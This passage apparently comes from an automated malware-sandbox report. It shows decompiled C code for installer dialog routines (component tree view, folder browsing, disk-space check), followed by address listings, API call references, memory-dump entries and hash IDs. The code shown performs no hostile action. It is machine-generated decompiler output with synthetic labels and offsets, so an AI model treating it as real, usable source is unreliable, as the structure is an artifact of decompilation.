											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                        0x00404871
                                                                                                        0x00404877
                                                                                                        0x00404879
                                                                                                        0x0040487f
                                                                                                        0x00404885
                                                                                                        0x00404892
                                                                                                        0x0040489b
                                                                                                        0x0040489e
                                                                                                        0x004048a1
                                                                                                        0x00404ac9
                                                                                                        0x00404ad0
                                                                                                        0x00404ae4
                                                                                                        0x00404ad2
                                                                                                        0x00404ad4
                                                                                                        0x00404ad7
                                                                                                        0x00404ad8
                                                                                                        0x00404adf
                                                                                                        0x00404adf
                                                                                                        0x00404af0
                                                                                                        0x00404afe
                                                                                                        0x00404b01
                                                                                                        0x00404b17
                                                                                                        0x00404b8f
                                                                                                        0x00404b92
                                                                                                        0x00404b94
                                                                                                        0x00404b9e
                                                                                                        0x00404bac
                                                                                                        0x00404bac
                                                                                                        0x00404bae
                                                                                                        0x00404bb8
                                                                                                        0x00404bbe
                                                                                                        0x00404bdf
                                                                                                        0x00404bc0
                                                                                                        0x00404bcd
                                                                                                        0x00404bcd
                                                                                                        0x00404bbe
                                                                                                        0x00404bb8
                                                                                                        0x00000000
                                                                                                        0x00404b92
                                                                                                        0x00404b1c
                                                                                                        0x00404b27
                                                                                                        0x00404b2c
                                                                                                        0x00404b33
                                                                                                        0x00404b3a
                                                                                                        0x00404b44
                                                                                                        0x00404b44
                                                                                                        0x00404b48
                                                                                                        0x00404b4d
                                                                                                        0x00404b52
                                                                                                        0x00404b68
                                                                                                        0x00404b54
                                                                                                        0x00404b54
                                                                                                        0x00404b5c
                                                                                                        0x00404b63
                                                                                                        0x00404b5e
                                                                                                        0x00404b5e
                                                                                                        0x00404b5e
                                                                                                        0x00404b5c
                                                                                                        0x00404b6c
                                                                                                        0x00404b6e
                                                                                                        0x00404b7c
                                                                                                        0x00404b7d
                                                                                                        0x00404b89
                                                                                                        0x00404b8c
                                                                                                        0x00404b8c
                                                                                                        0x00404b4d
                                                                                                        0x00000000
                                                                                                        0x00404b3a
                                                                                                        0x00404b1e
                                                                                                        0x00404b25
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404be2
                                                                                                        0x00404be2
                                                                                                        0x00404be9
                                                                                                        0x00404c5d
                                                                                                        0x00404c64
                                                                                                        0x00404c70
                                                                                                        0x00404c70
                                                                                                        0x00404c79
                                                                                                        0x00404c7b
                                                                                                        0x00404c82
                                                                                                        0x00404c85
                                                                                                        0x00404c85
                                                                                                        0x00404c8b
                                                                                                        0x00404c92
                                                                                                        0x00404c95
                                                                                                        0x00404c95
                                                                                                        0x00404c9b
                                                                                                        0x00404ca1
                                                                                                        0x00404ca7
                                                                                                        0x00404ca7
                                                                                                        0x00404cb4
                                                                                                        0x00404e01
                                                                                                        0x00404e08
                                                                                                        0x00404e25
                                                                                                        0x00404e2b
                                                                                                        0x00404e3d
                                                                                                        0x00404e3d
                                                                                                        0x00000000
                                                                                                        0x00404cba
                                                                                                        0x00404cbc
                                                                                                        0x00404cc4
                                                                                                        0x00404cc8
                                                                                                        0x00404cc8
                                                                                                        0x00404cd0
                                                                                                        0x00404d11
                                                                                                        0x00404d13
                                                                                                        0x00404d23
                                                                                                        0x00404d26
                                                                                                        0x00404d2b
                                                                                                        0x00404d32
                                                                                                        0x00404d35
                                                                                                        0x00404dd7
                                                                                                        0x00404ddd
                                                                                                        0x00404deb
                                                                                                        0x00404dfc
                                                                                                        0x00404dfc
                                                                                                        0x00000000
                                                                                                        0x00404deb
                                                                                                        0x00404d3b
                                                                                                        0x00404d3e
                                                                                                        0x00404d44
                                                                                                        0x00404d49
                                                                                                        0x00404d4b
                                                                                                        0x00404d4d
                                                                                                        0x00404d53
                                                                                                        0x00404d5a
                                                                                                        0x00404d5f
                                                                                                        0x00404d66
                                                                                                        0x00404d69
                                                                                                        0x00404d69
                                                                                                        0x00404d70
                                                                                                        0x00404d7c
                                                                                                        0x00404d80
                                                                                                        0x00404d82
                                                                                                        0x00404d82
                                                                                                        0x00404d72
                                                                                                        0x00404d74
                                                                                                        0x00404d74
                                                                                                        0x00404da2
                                                                                                        0x00404dae
                                                                                                        0x00404dbd
                                                                                                        0x00404dbd
                                                                                                        0x00404dbf
                                                                                                        0x00404dc2
                                                                                                        0x00404dcb
                                                                                                        0x00000000
                                                                                                        0x00404cd2
                                                                                                        0x00404cdd
                                                                                                        0x00404ce0
                                                                                                        0x00404ce5
                                                                                                        0x00404ce7
                                                                                                        0x00404ceb
                                                                                                        0x00404cfb
                                                                                                        0x00404d05
                                                                                                        0x00404d07
                                                                                                        0x00404d0a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404ced
                                                                                                        0x00404ced
                                                                                                        0x00404cf3
                                                                                                        0x00404cf5
                                                                                                        0x00404cf5
                                                                                                        0x00404cf6
                                                                                                        0x00404cf7
                                                                                                        0x00000000
                                                                                                        0x00404ced
                                                                                                        0x00404cd0
                                                                                                        0x00404cb4
                                                                                                        0x00404bf1
                                                                                                        0x00000000
                                                                                                        0x00404c07
                                                                                                        0x00404c11
                                                                                                        0x00404c16
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404c28
                                                                                                        0x00404c2d
                                                                                                        0x00404c39
                                                                                                        0x00404c39
                                                                                                        0x00404c3b
                                                                                                        0x00404c4a
                                                                                                        0x00404c4c
                                                                                                        0x00404c53
                                                                                                        0x00404c56
                                                                                                        0x00000000
                                                                                                        0x00404c56
                                                                                                        0x00404bf1
                                                                                                        0x004048a7
                                                                                                        0x004048ac
                                                                                                        0x004048b6
                                                                                                        0x004048b7
                                                                                                        0x004048c0
                                                                                                        0x004048cb
                                                                                                        0x004048d6
                                                                                                        0x004048dc
                                                                                                        0x004048ea
                                                                                                        0x004048ff
                                                                                                        0x00404904
                                                                                                        0x0040490f
                                                                                                        0x00404918
                                                                                                        0x0040492d
                                                                                                        0x0040493e
                                                                                                        0x0040494b
                                                                                                        0x0040494b
                                                                                                        0x00404950
                                                                                                        0x00404956
                                                                                                        0x00404958
                                                                                                        0x0040495b
                                                                                                        0x00404960
                                                                                                        0x00404965
                                                                                                        0x00404967
                                                                                                        0x00404967
                                                                                                        0x00404987
                                                                                                        0x00404987
                                                                                                        0x00404989
                                                                                                        0x0040498a
                                                                                                        0x0040498f
                                                                                                        0x00404992
                                                                                                        0x00404995
                                                                                                        0x00404999
                                                                                                        0x0040499e
                                                                                                        0x004049a3
                                                                                                        0x004049a7
                                                                                                        0x004049ac
                                                                                                        0x004049b1
                                                                                                        0x004049b3
                                                                                                        0x004049bb
                                                                                                        0x00404a85
                                                                                                        0x00404a98
                                                                                                        0x00000000
                                                                                                        0x004049c1
                                                                                                        0x004049c4
                                                                                                        0x004049c7
                                                                                                        0x004049ca
                                                                                                        0x004049ca
                                                                                                        0x004049d0
                                                                                                        0x004049d6
                                                                                                        0x004049d9
                                                                                                        0x004049df
                                                                                                        0x004049e0
                                                                                                        0x004049e5
                                                                                                        0x004049ee
                                                                                                        0x004049f5
                                                                                                        0x004049f8
                                                                                                        0x004049fb
                                                                                                        0x004049fe
                                                                                                        0x00404a3a
                                                                                                        0x00404a63
                                                                                                        0x00404a3c
                                                                                                        0x00404a49
                                                                                                        0x00404a49
                                                                                                        0x00404a00
                                                                                                        0x00404a03
                                                                                                        0x00404a12
                                                                                                        0x00404a1c
                                                                                                        0x00404a24
                                                                                                        0x00404a2b
                                                                                                        0x00404a33
                                                                                                        0x00404a33
                                                                                                        0x004049fe
                                                                                                        0x00404a69
                                                                                                        0x00404a6a
                                                                                                        0x00404a76
                                                                                                        0x00404a76
                                                                                                        0x00404a83
                                                                                                        0x00404a9e
                                                                                                        0x00404aa2
                                                                                                        0x00404abf
                                                                                                        0x00404ac4
                                                                                                        0x00404ac7
                                                                                                        0x00000000
                                                                                                        0x00404aa4
                                                                                                        0x00404aa9
                                                                                                        0x00404ab2
                                                                                                        0x00404e3f
                                                                                                        0x00404e51
                                                                                                        0x00404e51
                                                                                                        0x00404aa2
                                                                                                        0x00000000
                                                                                                        0x00404a83
                                                                                                        0x004049bb

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 0040486A
                                                                                                        • GetDlgItem.USER32 ref: 00404877
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                        • LoadBitmapA.USER32 ref: 004048D6
                                                                                                        • SetWindowLongA.USER32 ref: 004048F0
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                        • DeleteObject.GDI32(?), ref: 00404950
                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                        • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                        • SetWindowLongA.USER32 ref: 00404A98
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                                        • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                        • GetDlgItem.USER32 ref: 00404E36
                                                                                                        • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1638840714-813528018
                                                                                                        • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                        • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                        • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                        • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                                        0x0040435c
                                                                                                        0x00404363
                                                                                                        0x0040436f
                                                                                                        0x0040437d
                                                                                                        0x00404385
                                                                                                        0x00404389
                                                                                                        0x0040438f
                                                                                                        0x0040438f
                                                                                                        0x0040439b
                                                                                                        0x0040440f
                                                                                                        0x00404416
                                                                                                        0x004044eb
                                                                                                        0x004044f2
                                                                                                        0x00404501
                                                                                                        0x00404501
                                                                                                        0x00404505
                                                                                                        0x0040450b
                                                                                                        0x00404518
                                                                                                        0x0040451a
                                                                                                        0x0040451a
                                                                                                        0x00404528
                                                                                                        0x0040452d
                                                                                                        0x00404530
                                                                                                        0x00404537
                                                                                                        0x0040453a
                                                                                                        0x00404571
                                                                                                        0x00404573
                                                                                                        0x00404579
                                                                                                        0x00404580
                                                                                                        0x00404582
                                                                                                        0x00404582
                                                                                                        0x0040459e
                                                                                                        0x004045da
                                                                                                        0x00000000
                                                                                                        0x004045a0
                                                                                                        0x004045a3
                                                                                                        0x004045b7
                                                                                                        0x004045b9
                                                                                                        0x00000000
                                                                                                        0x004045b9
                                                                                                        0x0040453c
                                                                                                        0x00404540
                                                                                                        0x0040456f
                                                                                                        0x0040456f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404542
                                                                                                        0x00404542
                                                                                                        0x0040454f
                                                                                                        0x00404554
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404558
                                                                                                        0x0040455a
                                                                                                        0x0040455a
                                                                                                        0x00404565
                                                                                                        0x00404568
                                                                                                        0x0040456d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040456d
                                                                                                        0x004045c8
                                                                                                        0x004045cf
                                                                                                        0x004045d6
                                                                                                        0x004045dd
                                                                                                        0x004045dd
                                                                                                        0x004045e2
                                                                                                        0x004045e4
                                                                                                        0x004045ec
                                                                                                        0x004045f2
                                                                                                        0x004045f2
                                                                                                        0x00404602
                                                                                                        0x0040460c
                                                                                                        0x00404614
                                                                                                        0x0040462a
                                                                                                        0x00404616
                                                                                                        0x0040461a
                                                                                                        0x0040461a
                                                                                                        0x00404614
                                                                                                        0x0040462f
                                                                                                        0x00404634
                                                                                                        0x00404639
                                                                                                        0x00404642
                                                                                                        0x00404642
                                                                                                        0x0040464b
                                                                                                        0x0040464d
                                                                                                        0x0040464d
                                                                                                        0x00404659
                                                                                                        0x00404661
                                                                                                        0x0040466b
                                                                                                        0x0040466b
                                                                                                        0x00404670
                                                                                                        0x00000000
                                                                                                        0x00404670
                                                                                                        0x0040453a
                                                                                                        0x004044f4
                                                                                                        0x004044fb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004044fb
                                                                                                        0x0040441c
                                                                                                        0x00404422
                                                                                                        0x0040443c
                                                                                                        0x00404441
                                                                                                        0x0040444b
                                                                                                        0x00404452
                                                                                                        0x00404461
                                                                                                        0x00404464
                                                                                                        0x00404467
                                                                                                        0x0040446e
                                                                                                        0x00404476
                                                                                                        0x00404479
                                                                                                        0x0040447d
                                                                                                        0x00404484
                                                                                                        0x0040448c
                                                                                                        0x004044e4
                                                                                                        0x0040448e
                                                                                                        0x0040448f
                                                                                                        0x00404496
                                                                                                        0x004044a0
                                                                                                        0x004044a8
                                                                                                        0x004044b5
                                                                                                        0x004044c9
                                                                                                        0x004044cd
                                                                                                        0x004044cd
                                                                                                        0x004044c9
                                                                                                        0x004044d2
                                                                                                        0x004044dd
                                                                                                        0x004044dd
                                                                                                        0x0040448c
                                                                                                        0x00000000
                                                                                                        0x00404441
                                                                                                        0x0040442f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404435
                                                                                                        0x00000000
                                                                                                        0x0040439d
                                                                                                        0x0040439d
                                                                                                        0x004043a9
                                                                                                        0x004043b3
                                                                                                        0x004043c0
                                                                                                        0x004043c0
                                                                                                        0x004043c6
                                                                                                        0x004043cf
                                                                                                        0x004043d8
                                                                                                        0x004043db
                                                                                                        0x004043de
                                                                                                        0x004043e6
                                                                                                        0x004043e9
                                                                                                        0x004043ec
                                                                                                        0x004043f4
                                                                                                        0x004043fb
                                                                                                        0x00404402
                                                                                                        0x00404676
                                                                                                        0x00404688
                                                                                                        0x00404688
                                                                                                        0x0040440d
                                                                                                        0x00000000
                                                                                                        0x0040440d

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 004043A2
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040448F
